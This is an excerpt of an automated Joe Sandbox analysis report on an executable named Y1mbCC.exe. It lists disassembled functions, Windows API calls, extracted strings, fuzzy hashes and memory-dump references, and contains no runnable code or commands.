Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 029a4bacb8bced9a3e732123250ddc04121f4935cf4fbcf121ce7f29a2c31967
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: F7513C36618B4196D720AB56A84036F7BA8FB89BA0F500174EB8D07B65CF3CF4A1CB41

Function 00007FFE11ECEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE11ECEBA3
GetLastError.KERNEL32 ref: 00007FFE11ECEBC5

Strings

U, xrefs: 00007FFE11ECEB4F

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 8a4866b0bc8c85753416a4db758c87d207d97653635e174ff4d2c19ac147cc6c
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 2241C522B19E9181DB20CFA6EC453BA6765FB887A4F844131EE4E877A4DF3CE441CB50

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE11ED0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11EC3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE11EC3A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE11ED0993

Strings

csm, xrefs: 00007FFE11ED092B
f, xrefs: 00007FFE11ED0925

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 348988a7b17c2f4960f0b59bcc183b708c021111a6ce9b6fc81435b2399c3c5d
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 0F110A32A18BC585EB509F53D8412AE6B68EB84FD4F4C9075EF4807B65CE3CD951C740

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE11EC3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE11EC112F), ref: 00007FFE11EC39E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE11EC112F), ref: 00007FFE11EC3A21

Strings

csm, xrefs: 00007FFE11EC3A0E

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 0381c2a86344d1019a7162f86068a44b25af8404d5b7e9ceb1301416ac79f208
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: AF11FE36618F4182EB618B5AF84026AB7E9FB88BA4F584275DE8D07768DF3CD551CB00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: Y1mbCC.exePID: 6108, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	458
Total number of Limit Nodes:	10

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

M, xrefs: 0000000140005EA9
p, xrefs: 0000000140005EB1
i, xrefs: 0000000140005EC1
l, xrefs: 0000000140005F82
., xrefs: 0000000140005ED9
L, xrefs: 0000000140005EB9
o, xrefs: 0000000140005FA5
., xrefs: 0000000140005F78
t, xrefs: 0000000140005F73
s, xrefs: 0000000140005EC9
m, xrefs: 0000000140005F5A
d, xrefs: 0000000140005EE1
t, xrefs: 0000000140005ED1
m, xrefs: 0000000140005F91
c, xrefs: 0000000140005FAA
M, xrefs: 0000000140005E99
t, xrefs: 0000000140005EF1
c, xrefs: 0000000140005F69
l, xrefs: 0000000140005F9B
s, xrefs: 0000000140005F5F
a, xrefs: 0000000140005EE9
l, xrefs: 0000000140005FA0
d, xrefs: 0000000140005F7D
r, xrefs: 0000000140005F6E
a, xrefs: 0000000140005F96
v, xrefs: 0000000140005F64
s, xrefs: 0000000140005EA1
l, xrefs: 0000000140005F87

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE148C1C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE148C1C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE148C1C7A
_RTC_Initialize.LIBCMT ref: 00007FFE148C1CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE148C1CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE148C1CF9

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: 35234afc98f63d2941bf1edb6757b9454aa0fe0673d1e4307625a92e2cd6bc3b
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 63819030E08F4386F654AB6794C1AF96291AF477A0F8444B5FA4C477B6DE3CE84D8B00

Function 00007FFE148C1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE148C1753
FreeLibrary.KERNEL32 ref: 00007FFE148C1981

Part of subcall function 00007FFE148C1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE148C1BC0
Part of subcall function 00007FFE148C1B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE148C1BC6

Part of subcall function 00007FFE148C1720: FindFirstFileA.KERNELBASE ref: 00007FFE148C1536

Strings

WordpadFilter.db, xrefs: 00007FFE148C1527

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 8ea55b244e04837401831e8b38cd183473e849fed77887268738134cb550498d
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: EC318B32B15F4189E700DBA2D8806ED73B5EB8A798F448535EE4C13B58EF38D55AC740

Function 00007FFE148C11B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE148C14EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE148C14F7

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: c151e9983670358ec4cab2455bf73784bd57ad6bbda2a009d38818b533c12c2c
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: 5F816B32A19F8245E6118B3698C05B9A694FF57BE4F548335FF98637A2DF3CE0968700

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
SeLoadDriverPrivilege, xrefs: 000000014000402A
null, xrefs: 0000000140003FCE

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
